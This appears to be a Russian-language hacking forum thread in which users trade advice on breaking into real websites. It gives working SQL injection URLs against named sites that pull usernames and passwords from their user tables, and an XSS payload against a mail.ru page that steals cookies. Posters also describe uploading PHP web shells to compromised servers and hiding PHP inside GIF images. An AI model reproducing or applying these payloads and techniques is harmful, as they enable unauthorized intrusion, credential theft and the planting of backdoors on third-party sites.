Куда не пробую, не выходит... "Can't create/write to file '/home/httpd/vhosts/site.org/httpdocs/images/c.php' (Errcode: 13)" Искал папку tmp, чаще всего просто встречал-не нашёл. Инклуда нет, я не нашёл.Двиг баганый, я уже заливал на многие такие же через админку, нормально аплоадило, расширение не менялось.Вот первый раз столкнулся. Если у кого есть желание посмотреть, могу в пм скинуть данные для доступа в админку и саму скулю.
Народ подскажите какой префикс у таблиц форума http://www.stavochka.com/forum/index.php а то я ужо за''''ся =)
jokester, там не дефолт... Не канает phpbb_ Вот смотри сам.. http://www.new.stavochka.com/view.php?contentid=999999999999%20union%20select%201,2,3,4,username,6,7,8,9,10%20%20from%20phpbb_users-- Есть подозрение что там ваще без префикса http://www.new.stavochka.com/view.php?contentid=999999999999%20union%20select%201,2,3,4,username,6,7,8,9,10%20%20from%20users-- Но тогда почему нету user_password ?? блин.
http://www.new.stavochka.com/view.php?contentid=999999999999+union+select+1,2,3,4,concat_ws(0x2F,username,userpassword),6,7,8,9,10+from+users-- Смотри сурс странички авторизации <input name=userpassword size=18 type=password> Бывает, что совпадает с именем колумна (но не всегда конечно). А таблицы форума могут лежать в другой базе, к которой вообще может не быть доступа
Привет, сорри за нубский вопрос, залил пхп шелл на один сайт и обнаружил, что кроме него там еще две сотни, файл я могу залить папку к каждому, и вот я заливаю шелл в нужную мне папку, дергаю из браузера, но пхп не интерпретируется, файлы используются cfm (получается в одной папке пхп катит, в другой - нет), я бы залил хтаксес, но там Microsoft-IIS/5.0 сервак. Как залить шелл? Спасибо зы: нужно для общего развития)
S0ulVortex, слепая скуля. Code: http://www.fontsmith.com/custom.php?id=9'+union+select+1,2,3,4,5,6,7,8,9/* проблема в том что стоит два (или четыре) подряд запроса с разным количеством полей в запросе и параметр подставляется туда и туда. Получается если заюзать количество столбиков в юнионе которое равно количеству в первом запросе, то второй выдаст ошибку, если равное количеству во втором то ошибку выдаст первый, если вообще левое, то ОБА выдадут ошибку (это и есть твои 4 ошибки).
Вопрос: допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script> Вопрос, как её заносить в ссылку по которой должен отклик от жертвы произойти со скоиптом ("><script>alert(document.cookie)</script>) или без ?????
Народ чет не понятен вопрос шелл через картинку вставляю в конец файла(.gif) (открытым блокнотом) к примеру <?php echo "zzzzz" ?> Он у меня заливает но картинка становиться большой 8*292 x 8*292 пикселей И не выводиться "zzzzz" Что делать? С чем это едят?
Задумывался над тем же вопросом. Хорошая статья разора. http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/
всё начиналось очень хорошо, пока дело не дошло до вывода админских логинов:паролей.. значит запрос такой: и в ответ ничего кроме всяческих ошибок.. что можно сделать?